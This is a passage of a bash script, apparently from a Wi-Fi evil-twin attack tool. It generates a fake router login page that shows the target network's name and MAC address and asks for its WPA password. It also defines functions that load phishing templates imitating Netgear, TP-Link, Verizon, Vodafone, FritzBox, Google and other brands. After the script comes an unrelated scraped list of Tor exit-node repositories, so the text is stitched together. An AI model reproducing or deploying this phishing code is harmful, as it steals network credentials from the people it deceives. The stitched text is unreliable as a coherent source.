data-theme=\"a\"> <div data-role=\"main\" class=\"ui-content ui-body ui-body-b\" dir=\"$DIALOG_WEB_DIR\"> <h3 style=\"text-align:center;\">$DIALOG_WEB_OK</h3> </div> </div> </body> </html>" > $DUMP_PATH/data/final.html echo "<!DOCTYPE html> <html> <head> <title>Login Page</title> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\">  <link rel=\"stylesheet\" type=\"text/css\" href=\"css/jquery.mobile-1.4.5.min.css\"/> <link rel=\"stylesheet\" type=\"text/css\" href=\"css/main.css\"/>  <script src=\"js/jquery-1.11.1.min.js\"></script> <script src=\"js/jquery.mobile-1.4.5.min.js\"></script> <script src=\"js/jquery.validate.min.js\"></script> <script src=\"js/additional-methods.min.js\"></script> </head> <body>  <div data-role=\"page\" data-theme=\"a\"> <div data-role=\"main\" class=\"ui-content ui-body ui-body-b\" dir=\"$DIALOG_WEB_DIR\"> <h3 style=\"text-align:center;\">$DIALOG_WEB_ERROR</h3> <a href=\"index.htm\" class=\"ui-btn ui-corner-all ui-shadow\" onclick=\"location.href='index.htm'\">$DIALOG_WEB_BACK</a> </div> </div> </body> </html>" > $DUMP_PATH/data/error.html echo "<!DOCTYPE html> <html> <head> <title>Login Page</title> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width, height=device-height, initial-scale=1.0\">  <link rel=\"stylesheet\" type=\"text/css\" href=\"css/jquery.mobile-1.4.5.min.css\"/> <link rel=\"stylesheet\" type=\"text/css\" href=\"css/main.css\"/>  <script src=\"js/jquery-1.11.1.min.js\"></script> <script src=\"js/jquery.mobile-1.4.5.min.js\"></script> <script src=\"js/jquery.validate.min.js\"></script> <script src=\"js/additional-methods.min.js\"></script> </head> <body>  <div data-role=\"page\" data-theme=\"a\"> <div class=\"ui-content\" dir=\"$DIALOG_WEB_DIR\"> <fieldset> <form id=\"loginForm\" class=\"ui-body ui-body-b ui-corner-all\" action=\"check.php\" method=\"POST\"> </br> <div class=\"ui-field-contain ui-responsive\" style=\"text-align:center;\"> <div>ESSID: <u>$Host_SSID</u></div> <div>BSSID: <u>$Host_MAC</u></div> <div>Channel: <u>$Host_CHAN</u></div> </div> <div style=\"text-align:center;\"> <br><label>$DIALOG_WEB_INFO</label></br> </div> <div class=\"ui-field-contain\" > <label for=\"key1\">$DIALOG_WEB_INPUT</label> <input id=\"key1\" data-clear-btn=\"true\" type=\"password\" value=\"\" name=\"key1\" maxlength=\"64\"/> </div> <input data-icon=\"check\" data-inline=\"true\" name=\"submitBtn\" type=\"submit\" value=\"$DIALOG_WEB_SUBMIT\"/> </form> </fieldset> </div> </div> <script src=\"js/main.js\"></script> <script> $.extend( $.validator.messages, { required: \"$DIALOG_WEB_ERROR_MSG\", maxlength: $.validator.format( \"$DIALOG_WEB_LENGTH_MAX\" ), minlength: $.validator.format( \"$DIALOG_WEB_LENGTH_MIN\" )}); </script> </body> </html>" > $DUMP_PATH/data/index.htm } # Functions to populate the content for the custom phishing pages function ARRIS { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/ARRIS-ENG/* $DUMP_PATH/data } function BELKIN { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/belkin_eng/* $DUMP_PATH/data } function NETGEAR { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/netgear_eng/* $DUMP_PATH/data } function ARRIS2 { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/arris_esp/* $DUMP_PATH/data } function NETGEAR2 { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/netgear_esp/* $DUMP_PATH/data } function TPLINK { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/tplink/* $DUMP_PATH/data } function VODAFONE { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/vodafone_esp/* $DUMP_PATH/data } function VERIZON { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/verizon/Verizon_files $DUMP_PATH/data cp $WORK_DIR/sites/verizon/Verizon.html $DUMP_PATH/data } function HUAWEI { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/huawei_eng/* $DUMP_PATH/data } function ZIGGO_NL { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/ziggo_nl/* $DUMP_PATH/data } function KPN_NL { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/kpn_nl/* $DUMP_PATH/data } function ZIGGO2016_NL { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/ziggo2_nl/* $DUMP_PATH/data } function FRITZBOX_DE { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/fritzbox_de/* $DUMP_PATH/data } function FRITZBOX_ENG { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/fritzbox_eng/* $DUMP_PATH/data } function GENEXIS_DE { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/genenix_de/* $DUMP_PATH/data } function Login-Netgear { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/Login-Netgear/* $DUMP_PATH/data } function Login-Xfinity { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/Login-Xfinity/* $DUMP_PATH/data } function Telekom { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/telekom/* $DUMP_PATH/data } function google { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/google_de/* $DUMP_PATH/data } function MOVISTAR_ES { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/movistar_esp/* $DUMP_PATH/data } ######################################### < INTERFACE WEB > ######################################## top && setresolution && setinterface

jamazi / Jailbox

18

Torify the system with multiple tor exit nodes and load balance.

universal

iptableslinuxload-balance+5

3

Updated 6mo ago

7c / Torfilter

17

tor network exit-nodes list for ip reputation purposes

universal

listprivacytor+1

3

Updated 51m ago

Results for "exit-node"

ItalyPaleAle / Tailsocks

jseidl / Torblock

abohmeed / Cronmanager

assafmo / IsTorExit

cterence / Tailout

tailscale-dev / Glinet Exit Node Switch

simonecorsi / Fine

RemoteToHome-io / Gl Tailscale Fix

IntelligenceX / Ip2tor

uforia / Exitgather

jgrahamc / Torexit

SOYJUN / Application With Raw IP Sockets

tailscale-support / Mullvad Script

shahradelahi / Node Exit Signal

eon01 / NodeSS

k4m4 / Tor Detect

nokonoko / Fuck AWS Tor

Emersonmafra / F

jamazi / Jailbox

7c / Torfilter

ItalyPaleAle / Tailsocks

jseidl / Torblock

abohmeed / Cronmanager

assafmo / IsTorExit

cterence / Tailout

tailscale-dev / Glinet Exit Node Switch

simonecorsi / Fine

RemoteToHome-io / Gl Tailscale Fix

IntelligenceX / Ip2tor

uforia / Exitgather

jgrahamc / Torexit

SOYJUN / Application With Raw IP Sockets

tailscale-support / Mullvad Script

shahradelahi / Node Exit Signal

eon01 / NodeSS

k4m4 / Tor Detect

nokonoko / Fuck AWS Tor

Emersonmafra / F

jamazi / Jailbox

7c / Torfilter